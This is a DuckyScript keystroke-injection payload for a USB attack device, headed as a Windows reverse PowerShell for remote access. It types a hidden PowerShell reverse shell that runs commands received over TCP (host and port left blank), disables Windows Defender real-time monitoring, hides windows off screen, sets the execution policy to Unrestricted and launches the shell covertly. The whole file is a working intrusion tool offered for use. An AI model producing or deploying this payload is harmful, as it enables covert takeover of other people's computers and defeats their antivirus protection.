REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
REM Description: Reverse-PowerShell Windows. I am not responsible for your actions.
REM Version: 1.0
REM Category: Remote_Access
DELAY 750
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 750
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING Add-Content "$env:TEMP\34593.ps1" '$c = New-Object System.Net.Sockets.TCPClient("",);$s = $c.GetStream();[byte[]]$b = 0..255|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );$sb2 = $sb + "PS " + (pwd).Path + "> ";$sby = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};$c.Close()'
ENTER
DELAY 750
STRING Set-MpPreference -DisableRealtimeMonitoring $true
DELAY 500
ENTER
DELAY 750
STRING start-Process powershell.exe -windowstyle hidden "$env:TEMP\34593.ps1"
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL s
DELAY 1000
STRING C:\Windows\config-34593.ps1
ENTER
DELAY 1000
ALT F4
DELAY 750
GUI r
DELAY 750
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 1000
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 750
STRING m
DELAY 750
DOWNARROW
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 750
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-34593.ps1
ENTER